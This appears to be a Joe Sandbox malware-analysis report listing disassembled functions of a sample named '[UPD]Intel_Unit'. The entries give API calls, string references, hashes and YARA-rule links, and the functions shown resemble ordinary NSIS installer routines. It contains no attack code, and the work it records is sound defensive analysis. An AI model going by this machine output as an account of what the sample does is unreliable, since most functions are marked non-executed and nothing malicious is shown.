Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

N, xrefs: 00404C06
, xrefs: 00404F39
M, xrefs: 00404B43
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

A, xrefs: 00404636
@rD, xrefs: 00404610
82D, xrefs: 004046DB
@%F, xrefs: 00404674

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

%s: failed opening file "%s", xrefs: 00406F0C
name, xrefs: 00406FBF
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
Delete: DeleteFile("%s"), xrefs: 00406DBC
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
Delete: DeleteFile failed("%s"), xrefs: 00406DFD

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

EnumProcessModules, xrefs: 0040648A
Module32NextW, xrefs: 004065DE
Module32FirstW, xrefs: 004065D3
PSAPI.DLL, xrefs: 00406464
EnumProcesses, xrefs: 00406482
Kernel32.DLL, xrefs: 0040659B
Process32NextW, xrefs: 004065C8
Process32FirstW, xrefs: 004065BD
CreateToolhelp32Snapshot, xrefs: 004065B5
GetModuleBaseNameW, xrefs: 00406494
Unknown, xrefs: 004064FC

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

open, xrefs: 004042DF
N, xrefs: 0040426C
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

[Rename], xrefs: 00406BC8, 00406BD7
%s=%s, xrefs: 00406B43
NUL, xrefs: 00406A9E
